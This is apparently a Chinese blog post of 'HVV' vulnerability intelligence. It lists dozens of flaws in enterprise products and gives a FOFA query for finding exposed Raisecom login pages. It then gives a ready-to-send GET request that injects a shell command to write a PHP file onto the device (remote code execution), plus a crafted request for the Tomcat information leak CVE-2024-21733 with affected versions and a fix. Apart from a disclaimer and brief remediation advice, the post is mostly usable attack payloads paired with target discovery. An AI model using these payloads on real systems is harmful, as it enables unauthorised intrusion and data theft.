免责声明
本文所提供的技术、信息或工具仅供学习和参考使用。请不要将这些信息用于任何非法或不当行为。使用本文内容引起的任何损失或后果,完全由使用者负责,作者不承担任何责任。使用这些信息即表示您同意本免责声明,并承诺遵守所有相关法律法规和道德规范。
HVV专项漏洞情报
K35-1开源-Webuserlogin-RCEW22-1Windows-TCPIP组件-RCEY24-8云时空-社会化商业ERP系统-InformationLeakageZ17-2紫光-电子档案管理系统-InformationLeakageB15-1北京星网锐捷网络技术有限公司-乐享智能运维管理平台-SQLC16-2喰星云-数字化餐饮服务系统-SQLC16-3喰星云-数字化餐饮服务系统-SQLD20-3DedeCMS--任意文件读取F28-5方天云-智慧平台系统-任意文件上传F8-20泛微-E-Office-InformationLeakageK34-1开源-ZoneMinder-SQLR14-3润申信息-企业标准化管理系统-SQLS38-3赛蓝-企业管理系统-SQLS44-2上海建业信息科技股份-章管家-SQLS44-3上海建业信息科技股份-章管家-PermissionACT5-3Tomcat--InformationLeakageW21-1WookTeam-在线团队协作工具-SQLY34-2银达云创-智慧校园管理系统-任意文件上传K33-1开源-数字酒店宽带运营系统-任意文件读取Y38-2用友-CRM客户关系管理系统-任意文件读取Z18-1甄云-SRM云平台-JNDI注入A18-3安美-数字酒店宽带运营系统-任意文件读取Z15-3中成科-信票务管理系统-SQLD1-6大华-DDS数字监控系统-SQLH17-3H3C-iMC智能管理中心-RCEH46-2H3C-iMC智能管理中心_-RCEH46-3H3C-iMC智能管理中心_-RCEH47-1杭州-三汇网关-RCEH48-1H3C-SecPath下一代防火墙-任意文件上传J30-2金斗云-HKMP智慧商业软件-SQLK32-1开源-短视频直播打赏系统-SSRFK32-2开源-短视频直播打赏系统-任意文件上传U1-1usdtAdmin-收款管理系统-SQLU1-2usdtAdmin-收款管理系统-PermissionAC
漏洞poc
FOFA语法:body="/images/raisecom/back.gif" && title=="Web user login"payload:
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+echo+%28phpinfo()%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0Accept-Encoding: gzip, deflate, brConnection: closeCopy to clipboardErrorCopied
访问验证
0day专项
漏洞信息
Apache Tomcat 信息泄露漏洞(CVE-2024-21733)情报。Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器,用于运行 Java 应用程序和动态网页。Coyote 是 Tomcat 的连接器,处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求,在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露。
影响版本
从8.5.7到8.5.639.0.0-M11到9.0.43Copy to clipboardErrorCopied
POST / HTTP/1.1Host: hostnameSec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: keep-aliveContent-Length: 6Content-Type: application/x-www-form-urlencodedXCopy to clipboardErrorCopied
同时提供一个简单的漏洞验证工具,规则设置的比较宽,为了防止漏测。工具测试结果仅供参考,不具有权威性。禁止使用工具进行非法操作和攻击,非法操作和攻击须有使用者本人承担,与该文章以及工具开发作者无关。
修复方式
建议Tomcat不直接对外提供服务,Tomcat前面如果有其他中间件代理(如Nginx),则该漏洞无法利用。
在不影响正常业务的情况下,升级至8.5.64、9.0.44等安全版本。
总结
以上资源来自:http://kpanda.wiki/#/需要查看更多详情的师傅请自行查看
推荐漏洞库信息:
https://sploitus.com/http://kpanda.wiki/#/https://www.yuque.com/u25571586/dyaqbugs?#
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……




还没有评论,来说两句吧...